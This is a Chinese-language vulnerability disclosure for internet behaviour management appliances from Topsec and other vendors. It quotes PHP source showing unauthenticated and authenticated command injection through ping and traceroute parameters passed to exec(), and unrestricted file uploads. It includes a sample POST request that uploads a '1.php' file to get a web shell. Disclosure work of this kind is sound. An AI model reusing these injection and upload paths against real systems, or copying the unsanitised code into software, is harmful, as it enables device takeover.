天融信等厂商上网行为管理设备任意命令执行漏洞

两处任意命令执行无需登录： 第一处： ``` if(key_exists("text_target", $_GET) && key_exists("text_pingcount", $_GET) && key_exists("text_packetsize", $_GET)) { $text_target = $_GET["text_target"]; $text_pingcount = $_GET["text_pingcount"]; $text_packetsize = $_GET["text_packetsize"]; $pingcmd = sprintf("ping %s -c %s -s %s", $text_target, $text_pingcount, $text_packetsize); exec($pingcmd, $lines); ``` /view/systemConfig/systemTool/ping/ping.php 第二处： ``` $text_target = $_GET["text_target"]; $text_ageout = $_GET["text_ageout"]; $text_minttl = $_GET["text_minttl"]; $text_maxttl = $_GET["text_maxttl"]; $traceroutecmd = sprintf("traceroute %s -f %s -m %s -w %s -q 1", $text_target, $text_minttl, $text_maxttl, $text_ageout); exec($traceroutecmd, $lines); $rettraceroutecmd .= _gettext("testing_wait").chr(10).chr(10); ``` /view/systemConfig/systemTool/traceRoute/traceroute.php 利用方式同上。 两处命令执行需登录： 第一处：/view/IPV6/ipv6networktool/ping/ping.php ``` if(key_exists("text_target", $_GET) && key_exists("text_pingcount", $_GET) && key_exists("text_packetsize", $_GET)) { $text_target6 = $_GET["text_target"]; $text_pingcount6 = $_GET["text_pingcount"]; $text_packetsize6 = $_GET["text_packetsize"]; $pingcmd = sprintf("ping -c %s -s %s %s", $text_pingcount6, $text_packetsize6, $text_target6); exec($pingcmd, $lines); $retpingcmd6 .= _gettext("testing_wait").chr(10).chr(10); ``` 第二处： /view/IPV6/ipv6networktool/traceroute/traceroute.php ``` $text_target = $_GET["text_target"]; $text_ageout = $_GET["text_ageout"]; $text_minttl = $_GET["text_minttl"]; $text_maxttl = $_GET["text_maxttl"]; $traceroutecmd = sprintf("traceroute6 -6 -f %s -m %s -w %s %s", $text_minttl, $text_maxttl, $text_ageout, $text_target); exec($traceroutecmd, $lines); $rettraceroutecmd .= _gettext("testing_wait").chr(10).chr(10); ``` 三处任意文件上传getshell需登录： 第一处： \view\userAuthentication\userDefined\upload.php ``` <?php $page_name = 'AuthenticationOptions'; include_once($_SERVER["DOCUMENT_ROOT"]."/authenticed_writable.php");//身份认证 ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://**.**.**.**/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://**.**.**.**/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link href="/css/skin.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="/js/prototype.js"></script> <script type="text/javascript" src="/js/base.js"></script> </head> <body> <?php function upload($file,$dir,$name) { $max_size=1024000; //500 KB $max_w = 8800; //最大宽度800像素 $max_h = 8600; //最大高度600像素 $min_w = 10; //最小宽度400像素 $min_h = 10; //最小高度300像素 if($dir) //如果路径不是以"/"结尾则加上"/" { if(substr($dir,-1)!="/") $dir=$dir."/"; } if($name=="") $name=$_FILES["$file"][name]; $len=strrpos($name,"."); //取得主文件名长度 if(!$len) $len=strlen($name); $name=substr($name,0,$len); //取得主文件名 //添加扩展名 if($_FILES["$file"][type]=="image/gif") $name=$name.".gif"; if($_FILES["$file"][type]=="image/pjpeg") $name=$name.".jpg"; if($_FILES["$file"][type]=="image/jpeg") $name=$name.".jpg"; if($_FILES["$file"][type]=="image/x-png") $name=$name.".png"; //检查上传过程中是否出现错误 if($_FILES["$file"][error]) //当发生错误时 { if(($_FILES["$file"][error]==1)||($_FILES["$file"][error]==2)) $info=_gettext('uploadFail'); if($_FILES["$file"][error] ==3) $info=_gettext('uploadFail'); if($_FILES["$file"][error] ==4) $info=_gettext('uploadFail'); if($_FILES["$file"][error] ==5) $info=_gettext('uploadFail'); } else //当上传成功时 { if(($_FILES["$file"][type]=="image/gif")||($_FILES["$file"][type]=="image/pjpeg")||($_FILES["$file"][type]=="image/x-png")||($_FILES["$file"][type]=="image/jpeg")) //是合法的文件类型时 { if($_FILES["$file"][size]<=$max_size) //检查文件大小 { $size=GetImageSize($_FILES["$file"][tmp_name]); if(($size[0]<=$max_w)&&($size[0]>=$min_w)&&($size[1]<=$max_h)&&($size[1]>=$min_h)) //检查图片的长宽 { //复制文件到指定位置。 copy($_FILES["$file"][tmp_name],$dir.$name); //复制文件，并改名 if(file_exists($dir.$name)) //检查是否上传成功 { $cmd = "mkdir /home/config/default/Image/"; exec($cmd); copy($_FILES["$file"][tmp_name],"/home/config/default/Image/".$name); //复制文件，并改名 $info=_gettext('uploadSuccess'); } else $info=_gettext('uploadFail'); } else //图片尺寸不合适时 { $info=_gettext('uploadFail_image_size_error'); } } else //文件超出限制时 { $info=_gettext('uploadFail_file_too_big'); } } else //文件类型非法时 { $info=_gettext('uploadFail_file_type_error'); } } return "$info"; } $info = upload("upImage","/var/www/auth/images/","") ?> <script language="javascript" type="text/javascript"> alert("<?php echo $info;?>"); window.location.href="list.php"; </script> </body></html> ``` 第二处： \view\systemObject\certificateAdmin\sslLib\upload.php ``` <?php $page_name = 'm_certification'; include_once($_SERVER["DOCUMENT_ROOT"]."/authenticed_writable.php");//ʭ·ވЖ¤ //include_once("E:/ag380-wp/page/nm/model/common_fun.php"); $certDir = '/usr/local/squid/var/temp/'; $result = -1; function upload(&$errorInfo) { global $certDir; global $result; $upfilename = 'file'; $file = $_FILES[$upfilename]; if($_FILES[$upfilename]['error'] != 0) { $errorInfo = _gettext('fail').'('.$_FILES[$upfilename]['error'].')'; return false; } $tmp_name=$file["tmp_name"]; if(!is_uploaded_file($tmp_name)) { $errorInfo = _gettext('tmp file error'); return false; } $destination = $certDir.$file["name"]; if(!file_exists($certDir)) mkdir($certDir); if(!move_uploaded_file ($tmp_name, $destination)) { $errorInfo = _gettext('movefail'); return false; } $result = load_ssl_certs($destination); eturn true; } if($_REQUEST) { foreach ($_REQUEST as $key=>&$value) { if(!is_array($value)) $value = stripslashes((trim($value))); } } if ( $_FILES['file']['name']!= '') { upload($reMsg); $reMsg1 ="error"; } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://**.**.**.**/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://**.**.**.**/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Ϟ±덢τµµ</title> <link href="/css/skin.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="/js/prototype.js"></script> <script type="text/javascript" src="/js/base.js"></script> <script type="text/javascript"> <?php if( $result != 0 ) echo "alert('".$reMsg1."!');"; ?> location.href = 'list.php'; </script> </head> <body> </body> </html> ``` 上面两处利用方式： ``` POST /view/systemObject/certificateAdmin/sslLib/upload.php HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: multipart/form-data; boundary=---------------------------7e0313222035c UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: **.**.**.**:9090 Content-Length: 203 Pragma: no-cache Cookie: PHPSESSID= Connection: close -----------------------------7e0313222035c Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/jpeg test -----------------------------7e0313222035c-- ``` 第三处： /view/fireWall/securityPolicy/upload.php ``` <?php $page_name = 'm_secpolicy'; include_once($_SERVER["DOCUMENT_ROOT"]."/authenticed_writable.php"); require_once("../../../model/File.php"); print_r($_POST); $upload = new UploadFile("/var/www/html/upload",'',2*1024); $upload->run('security_policy_file'); print_r($upload->get_info()); ?> ```